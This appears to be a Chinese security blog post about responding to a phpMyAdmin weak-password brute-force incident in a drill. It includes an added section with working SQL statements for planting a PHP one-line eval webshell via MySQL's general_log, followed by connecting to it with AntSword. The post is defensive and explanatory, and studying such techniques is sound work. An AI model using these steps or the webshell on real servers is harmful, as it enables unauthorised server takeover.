记一次phpMyAdmin弱口令爆破事件应急响应

为方便您的阅读,可点击下方蓝色字体,进行跳转↓↓↓

01 事件背景介绍


某内部应急演练中,安全部门在安全设备上观察到大量phpMyAdmin登录请求,现需根据流量情况进行安全事件分析。

phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。

攻击者会使用弱口令等方式对phpMyAdmin进行登录尝试,登录成功后通过SQL查询获取敏感数据,或者使用phpMyAdmin写入webshell,从而获取服务器权限。

02 流量分析过程

发现攻击者对10.X.X.10的phpMyAdmin的控制台进行大量的账号密码暴力破解攻击,触发安全设备的攻击告警事件,进一步查看服务器响应包,发现存在302状态码,即攻击者爆破口令成功,成功登录phpMyAdmin管理后台。

在这里插入图片描述

进一步追溯攻击者IP,以攻击者IP作为源地址进行安全事件检索,进一步发现攻击者使用phpMyAdmin控制台的import功能上传shell.php,将上传的webshell成功保存到C盘目录下。

在这里插入图片描述
在这里插入图片描述

而后攻击者进一步试图连接shell.php,执行命令且服务器成功返回命令执行结果。

在这里插入图片描述
在这里插入图片描述
据此判断主机10.X.X.10失陷,继续观察其他流量,未发现其余明显异常行为。



03 事件分析结果


攻击者使用弱口令爆破方式对phpMyAdmin进行登录尝试,登录成功phpMyAdmin的import模块功能写入webshell,从而获取服务器权限。

上述是通过phpMyAdmin的import模块功能写入webshell,这里额外补充利用phpmyadmin 日志写入 webshell的攻击手法。

在 phpmyadmin 中,利用 SQL 语句 show variables like ‘%general%’;查看general log 是否开启

在这里插入图片描述


若发现日志读写功能关闭,于是使用 SQL 语句:SET GLOBAL general_log=‘on’; SHOW VARIABLES LIKE ‘%general%’;打开general_log 日志读写功能。

在这里插入图片描述

打开日志读写功能后,根据图中 general_log_file 中的绝对路径制作一个木马文件:SET GLOBAL general_log_file=‘C:/phpStudy/www/shell.php’

在这里插入图片描述

接着往 shell.php 写入 SELECT '<?php eval($_POST["jkxy"]);?>

在这里插入图片描述

利用中国蚁剑工具连接一句话 shell.php,连接测试成功,打开虚拟终端,输入命令 whoami,发现命令执行成功。

在这里插入图片描述
在这里插入图片描述


04 安全加固建议


1、通过流量分析得知的webshell上传路径,对Webshell文件进行删除处理。

在这里插入图片描述
在这里插入图片描述


2、利用Webshell查杀攻击对网站目录进行进一步的扫描排查,如使用D盾查杀工具等。

在这里插入图片描述



3、及时修改mysql的root用户口令,确保密码强度符合要求,建议大小写字母+数字+特殊字符+8位以上。

  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Vista_AX

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值